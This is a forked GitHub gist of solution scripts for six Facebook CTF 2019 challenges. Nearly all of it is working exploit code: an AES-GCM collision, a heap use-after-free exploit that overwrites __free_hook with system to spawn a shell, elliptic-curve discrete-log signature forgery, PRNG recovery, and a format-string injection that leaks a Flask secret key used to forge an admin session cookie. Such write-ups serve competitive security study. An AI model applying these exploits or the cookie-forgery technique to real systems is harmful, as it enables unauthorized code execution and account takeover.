Skip to content

Instantly share code, notes, and snippets.

@sylhare
Forked from niklasb/0_frank.sage
Created June 3, 2019 14:10
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save sylhare/c77c5620e6934b03fd67405b9c774fb8 to your computer and use it in GitHub Desktop.
Save sylhare/c77c5620e6934b03fd67405b9c774fb8 to your computer and use it in GitHub Desktop.
Facebook CTF 2019 solutions: frank, babylist, storagespace, netscream, keybaseish, events
'''
Impl of AES-GCM collision, section 3.1, https://eprint.iacr.org/2017/664.pdf
Use this, then send two messages to the bot with the same message ID
(& ciphertext) but different keys. I didn't include the code, but it is as
easy as changing the encrypt_inner and send functions to use hardcoded
in and outputs.
We will send a benign version of the message first, and then the abusive version.
The bot will look up the message by message ID as follows for reporting (client.py):
(_, ts, ctxt, msg, fbtag) = [
x for x in self._all_messages[who] if x[0] == mid
][0]
We will have two messages with the same ID in this list, but the first one
is benign, so the report will be invalid and we get the flag.
Pseudocode encryption:
M = input message
kf, km = random keys
fbtag_key = server secret
# inner encryption with ephemeral key
cm = AES(key=km, M)
publish cm under message ID mid # <- this is the ciphertext that we reuse twice
# outer encryption (end-to-end)
M' = mid + km + H(cm)
com = HMAC(key=kf, M')
ctxt = RSA(M' + kf)
publish ctxt + com # <- this part we change between messages
# (specifically, we change km and compute
# a new commitment)
# server
fbtag = HMAC(key=fbtag_key, com + sender + receiver + time())
publish fbtag
'''
import Crypto.Cipher.AES as AES
from Crypto.Util import Counter
from Crypto.Util.number import bytes_to_long, long_to_bytes
import random
import sys
import requests
import socket
import itertools
F = GF(2)
BF.<X> = F[]
FF.<A> = GF(2 ^ 128, modulus=X ^ 128 + X ^ 7 + X ^ 2 + X + 1)
# helpers
def str2bits(str):
res = []
for c in str:
res += map(int,bin(ord(c))[2:].zfill(8))
return res
def int2ele(integer):
res = 0
for i in range(128):
# rightmost bit is x127
res += (integer & 1) * (A ^ (127 - i))
integer >>= 1
return res
def ele2int(element):
integer = element.integer_representation()
res = 0
for i in range(128):
res = (res << 1) + (integer & 1)
integer >>= 1
return res
def str2ele(s):
assert len(s) == 16
return int2ele(bytes_to_long(s))
def ele2str(x):
return long_to_bytes(ele2int(x), 16)
# AES-GCM implementation
def compute_tag(H, K0, txt):
len_txt = len(txt)
data = txt
while len(data) % 16:
data += '\0'
tag = 0
assert len(data) % 16 == 0
for i in range(len(data) // 16):
tag += int2ele(bytes_to_long(data[i * 16: (i + 1) * 16]))
tag *= H
tag += int2ele(8 * len_txt)
tag *= H
tag += int2ele(bytes_to_long(K0))
return ele2int(tag)
def xor(a, b):
return ''.join(chr(ord(x)^^ord(y)) for x, y in zip(a,b))
def get_k0(key, iv):
iv = bytes_to_long(iv)
aes_ecb = AES.new(key, AES.MODE_ECB)
return aes_ecb.encrypt(long_to_bytes((iv << 32) | 1, 16))
def get_hash_key(key):
aes_ecb = AES.new(key, AES.MODE_ECB)
return int2ele(bytes_to_long(aes_ecb.encrypt('\0'*16)))
# sanity check
def encrypt2(key, iv, plaintext):
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
enc = Cipher(
algorithms.AES(key),
modes.GCM(iv),
backend=default_backend(),
).encryptor()
ct = enc.update(plaintext)
ct += enc.finalize()
return ct, enc.tag
def encrypt(key, iv, plaintext):
ct2, tag2 = encrypt2(key, iv, plaintext)
assert len(key) == 16
aes_ecb = AES.new(key, AES.MODE_ECB)
H = get_hash_key(key)
assert len(iv) == 12
iv = bytes_to_long(iv)
len_plaintext = len(plaintext)
while len(plaintext)%16:
plaintext += '\0'
ctr = 2
ciphertext = ''
for i in range(len(plaintext)//16):
pt_block = plaintext[i*16:(i+1)*16]
ctr_block = aes_ecb.encrypt(long_to_bytes((iv << 32) | ctr, 16))
ctr += 1
ciphertext += xor(pt_block, ctr_block)
ciphertext = ciphertext[:len_plaintext]
K0 = get_k0(key, long_to_bytes(iv, 16))
auth_tag = compute_tag(H, K0, ciphertext)
assert auth_tag < (1 << 128)
assert ciphertext == ct2
assert int(tag2.encode('hex'), 16) == auth_tag
return ciphertext, auth_tag
class TagError(Exception):
pass
def decrypt(key, iv, ciphertext, auth_tag):
assert len(key) == 16
aes_ecb = AES.new(key, AES.MODE_ECB)
H = get_hash_key(key)
assert len(iv) == 12
iv = bytes_to_long(iv)
len_ct = len(ciphertext)
while len(ciphertext)%16:
ciphertext += '\0'
ctr = 2
plaintext = ''
for i in range(len(ciphertext)//16):
ct_block = ciphertext[i*16:(i+1)*16]
ctr_block = aes_ecb.encrypt(long_to_bytes((iv << 32) | ctr, 16))
ctr += 1
plaintext += xor(ct_block, ctr_block)
ciphertext = ciphertext[:len_ct]
K0 = get_k0(key, long_to_bytes(iv, 16))
expected_auth_tag = compute_tag(H, K0, ciphertext)
if auth_tag != expected_auth_tag:
raise TagError
return plaintext
def collide_gcm(key1, key2, iv, ciphertext):
iv = bytes_to_long(iv)
aes1 = AES.new(key1, AES.MODE_ECB)
aes2 = AES.new(key2, AES.MODE_ECB)
H1 = get_hash_key(key1)
H2 = get_hash_key(key2)
P1 = str2ele(aes1.encrypt(long_to_bytes((iv << 32) | 1, 16)))
P2 = str2ele(aes2.encrypt(long_to_bytes((iv << 32) | 1, 16)))
assert len(ciphertext) % 16 == 0
mlen = len(ciphertext) // 16 + 1
lens = int2ele(8 * len(ciphertext) + 128)
acc = lens * (H1 + H2) + P1 + P2
for i in range(1, mlen):
Hi = H1^(mlen + 2 - i) + H2^(mlen + 2 - i)
Ci = str2ele(ciphertext[(i-1) * 16: i * 16])
acc = acc + Ci * Hi
inv = (H1^2 + H2^2)^(-1)
Cmlen = acc * inv
Ca = ciphertext + ele2str(Cmlen)
K0 = get_k0(key1, long_to_bytes(iv, 16))
tag = compute_tag(H1, K0, Ca)
return Ca, tag
iv = b'a'*12
key1 = b'b'*16
key2 = b'c'*16
plaintext = b'abuse'
plaintext += b'a'*(32-len(plaintext))
ct, tag = encrypt(key1, iv, plaintext)
assert plaintext == decrypt(key1, iv, ct, tag)
ct2, tag2 = collide_gcm(key1, key2, iv, ct)
pt1 = decrypt(key1, iv, ct2, tag2)
pt2 = decrypt(key2, iv, ct2, tag2)
tag2 = long_to_bytes(tag2)
assert len(tag2) == 16
print 'pt1 = b%r' % pt1
print 'pt2 = b%r' % pt2
print 'tag = b%r' % tag2
print 'ct = b%r' % ct2
print 'iv = b%r' % iv
'''
Bug: The duplicate command memcpys one std::vector over another one,
which is... not recommended. After resizing the first one the second one points
to UAF memory. We can use this to leak and then overwrite a List object.
'''
import struct
from pwn import *
def connect():
global r
# r = remote('localhost', 4444)
r = remote('challenges.fbctf.com', 1343)
r.recvuntil('> ')
def create(name):
r.sendline('1')
r.recvuntil('list:\n')
r.sendline(name)
r.recvuntil('> ')
def add(listidx, num, wait=True):
num = struct.unpack('<i', struct.pack('<I', num))[0]
r.sendline('2')
r.recvuntil('list:\n')
r.sendline(str(listidx))
r.recvuntil('add:\n')
r.sendline(str(num))
if wait:
r.recvuntil('> ')
def view(listidx, i):
r.sendline('3')
r.recvuntil('list:\n')
r.sendline(str(listidx))
r.recvuntil('list:\n')
r.sendline(str(i))
r.recvuntil(' = ')
res = r.recvuntil('\n').strip()
r.recvuntil('> ')
return int(res)
def duplicate(listidx, name):
r.sendline('4')
r.recvuntil('list:\n')
r.sendline(str(listidx))
r.recvuntil('list:\n')
r.sendline(name)
r.recvuntil('> ')
def remove(listidx):
r.sendline('5')
r.recvuntil('list:\n')
r.sendline(str(listidx))
r.recvuntil('> ')
def more(listidx, num, wait=True):
for i in range(num):
print i
add(listidx, 0xbadbeef, wait=wait)
connect()
create('leak1') # 0
more(0, 3)
duplicate(0, 'leak1x') # 1
more(0, 2)
leak = view(1,0) + 2**32*view(1,1)
heap = leak - 0x55555576af20 + 0x0000555555759000
print 'heap @',hex(heap)
create('leak2') # 2
more(2, 512)
duplicate(2, 'leak2x') # 3
more(2, 1)
leak = view(3,0) + 2**32*view(3,1)
libc = leak - 0x7ffef7829ca0 + 0x00007ffff743e000
print 'libc @',hex(libc)
create('bar') # 4
add(4, struct.unpack('<i', 'sh\0\0')[0])
more(4, 16)
duplicate(4, 'baz') # 5
more(4, 16)
create('lul') # 6 -> victim
# Advance pointer of the UAF array until begin pointer of array 6
more(5, 11)
# Write-what-where by overwriting begin ptr
where = libc + 0x7ffff782b8e8 - 0x00007ffff743e000 # __free_hook
what = libc + 0x7ffff748d440 - 0x7ffff743e000 # system
# begin
add(5, 0)
add(5, 0)
# end
add(5, where % 2**32)
add(5, where // 2**32)
# end_capacity
where += 100
add(5, where % 2**32)
add(5, where // 2**32)
add(6, what % 2**32)
add(6, what // 2**32)
# trigger free('sh\0')
more(4, 32, wait=False)
r.interactive()
'''
Insight here was that the order of the generator is only 128 bit and
has small prime factors, thus we can use Pohlig-Hellman to solve dlog
and derive the key from the equation G*key = H.
'''
import random
import base64
import json
import hashlib
from pwnlib.tools import * # from https://github.com/niklasb/ctf-tools
from sage.all import EllipticCurve, GF, proof, factor
connect()
ru('> ')
print 'getting params'
sendln('{"command":"sign", "params":{"command":"info"}}')
cmd = readln()
ru('> ')
sendln(cmd)
ru('x**3 + ')
a = int(ru('*')[:-1])
ru('+ ')
b = int(ru(' ')[:-1])
ru('mod ')
mod = int(ru(')')[:-1])
ru(': (')
gx = int(ru(', ')[:-2])
gy = int(ru(')')[:-1])
ru(': (')
hx = int(ru(', ')[:-2])
hy = int(ru(')')[:-1])
prev_proof_state = proof.arithmetic()
proof.arithmetic(False) # turn off primality checking
FF = GF(mod)
EC = EllipticCurve([FF(a), FF(b)])
G = EC(gx, gy)
H = EC(hx, hy)
n = G.order()
print 'computing dlog'
print 'order', n
print 'order factors', factor(n)
key = G.discrete_log(H)
print 'done', key
assert G*key == H
def sign(message, key):
# n: curve order
# G: generator
while True:
k = random.randint(1, n)
Q = G * k
hash_message = message + str(int(Q[0]))
mhash = hashlib.sha256(hash_message)
r = int(mhash.hexdigest(), 16)
if r % n == 0:
continue
s = (k - (r * key)) % n
if s != 0:
return (r, s)
request = {
'command': 'flag',
'params': {
'name': 'fbctf'
}
}
text = json.dumps(request, sort_keys=True)
r, s = sign(text, key)
sig = base64.b64encode((str(r) + '|' + str(s)))
request['sig'] = sig
sendln(json.dumps(request))
interact()
'''
Key insight here was that the AES encryption was actually skipped due to use
of a shared global variable. Thus we directly get the PRNG output as the
IV in the "enc" file, which just has 2 bytes missing that we can brute force
to reconstruct the entire stream.
Pseudocode of binary logic:
rand():
return random 256-bit number
setup():
<initialize curve and point P>
r = rand()
new_key(): # PRNG implementation
xs = []
for i := 0 to 1: # run twice...
r = (G*r).x
xs.push((P*r).x)
return bottom 30 bytes of xs[0] + bottom 2 bytes of xs[1]
setup()
plain = read file argv[1]
ivec = new_key()
key = new_key()
cipher = aes_ige(plain, iv=ivec, key=key)
write key to file "key"
write ivec + cipher to file "enc"
'''
from IPython import embed
# from https://github.com/Surye/telepy/blob/master/crypt.py with small fixed
from ige import ige_decrypt
p256 = 115792089210356248762697446949407573530086143415290314195533631308867097853951L
a256 = p256 - 3
b256 = 41058363725152142129326129780047268409114441015993725554835256314039467401291L
## base point values
gx = 48439561293906451759052585252797914202762949526041747995844080717082404635286L
gy = 36134250956749795798585127919587881956611106672985015071877198253568414405109L
## order of the curve
qq = 115792089210356248762697446949407573529996955224135760342422259061068512044369L
prev_proof_state = proof.arithmetic()
proof.arithmetic(False) # turn off primality checking
FF = GF(p256)
EC = EllipticCurve([FF(a256), FF(b256)])
EC.set_order(qq)
_.<Y> = FF[]
def f(x):
return x^3 + a256*x + b256
def point(x):
x = FF(x)
poly = Y^2 - f(x)
return EC(x, poly.roots()[0][0])
# define the base point
G = EC(FF(gx), FF(gy))
x = 0xF6C4F766B3C61F09E609582224CC8EBCCF4CD4961EF780CC02E8F09A0EFA7CA5
y = 0xF212C5768D46716C6CAC4D23FF12E8AE89FD9EEEC83A0E83E35DB3AADE0CCB5B
d = 0x6FC45453894DE99C661581B0A12087B862667B785AABA7116DCDCB3CB3A79AFE
P = EC(FF(x), FF(y))
assert G == P*d
# assert (G*3)*2 == G*(3*2)
# assert (G*100)*200 == G*(100*200)
# exit()
enc = open('dist/enc', 'rb').read()
# actual_key = open('dist/test/key', 'rb').read()
actual_key = None
ivec = enc[:32]
cipher = enc[32:]
x1_lo = int(ivec[:30].encode('hex'),16)
x2_lo = int(ivec[30:].encode('hex'),16)
# L, R = 0, 2**16
L, R = 5245, 5246
def to_bytes(x, sz):
h = hex(int(x)).rstrip('L').lstrip('0x')
while len(h) < sz*2:
h = '0' + h
assert len(h) == sz*2
return h.decode('hex')
def check(X1):
res = [X1]
for i in range(10):
R = res[-1]*d
r = int(R[0])
X = P*r
res.append(X)
res = [int(X[0]) for X in res]
stream = ''
i = 0
while i + 1 < len(res):
stream += to_bytes(res[i] & ((1<<240)-1), 30)
stream += to_bytes((res[i + 1] >> 224) & 0xffff, 2)
i += 2
assert stream[:32] == ivec
key = stream[32:64]
if actual_key != None:
assert stream[32:64] == actual_key
print ige_decrypt(cipher, key, ivec)
for i in xrange(L, R):
if i % 1000 == 0:
print i
sys.stdout.flush()
x1 = x1_lo + (i << 240)
try:
X1 = point(x1)
except:
continue
R2 = X1*d
r2 = int(R2[0])
X2 = P*r2
x2 = int(X2[0])
if ((x2 >> 224) & 0xffff) == x2_lo:
print 'YES', i
sys.stdout.flush()
check(X1)
# Trick here was to use a small e and just chose the modulus based on the PIN
# assembled from https://twitter.com/baseishcoinfou1
X = 43522081190908620239526125376626925272670879862906206214798620592212761409287968319160030205818706732092664958217053982767385296720310547463903001181881966554081621263332073144333148831108871059921677679366681345909190184917461295644569942753755984548017839561073991169528773602380297241266112083733072690367
pin = 672241
e = 4
Y = X**e
N = Y - pin
# trivially, Y % N == pin
print '{}:{}'.format(e, N)
#!/usr/bin/env python3
'''
Step 1: get secret key this via format string injection:
event_name=a&event_address=b&event_important=__init__.__globals__[app].__dict__
I believe the server side has super weird code like:
event = Event(name='a', address='b') # sqlalchemy object
...
output += ('<li>{event.' + request.query['event_important'] + '}</li>').format(event=event)
THIS MUST BE RUN WITH PYTHON 3!
We learned the hard way that itsdangerous behavior varies between Python 2 and 3
'''
import requests
import base64
import hashlib
from itsdangerous import URLSafeTimedSerializer
from flask.sessions import TaggedJSONSerializer
# Just a random, valid session cookie
cookie = '.eJwlzj0OwjAMBtC7ZO7gOD-f3ctUdpwI1pZOiLuDxP6G907HOuf1SPvrvOeWjmekPXmjBQbIFohFYDMyqrOwc0En7TZyj7WKmsUQg2elusQURvEDYiyeSx5aa5-AiZKFuSvI2yDlrq2we5OgNWRYIGNMU4akLd3XPP-ZDKTPF8WzLyY.XPQOsQ.afA_iiPuSMB3xfj788GGmt7pgBI'
secret_key=b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'
def sign(values):
salt = 'cookie-session'
serializer = TaggedJSONSerializer()
signer_kwargs = {
'key_derivation': 'hmac',
'digest_method': hashlib.sha1
}
s = URLSafeTimedSerializer(secret_key, salt=salt,
serializer=serializer, signer_kwargs=signer_kwargs)
return s.dumps(values)
user = sign('admin')
def check():
r = requests.get('http://challenges.fbctf.com:8083/flag', cookies={
'events_sesh_cookie': cookie,
'user': user,
})
return r.text
print(check())
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment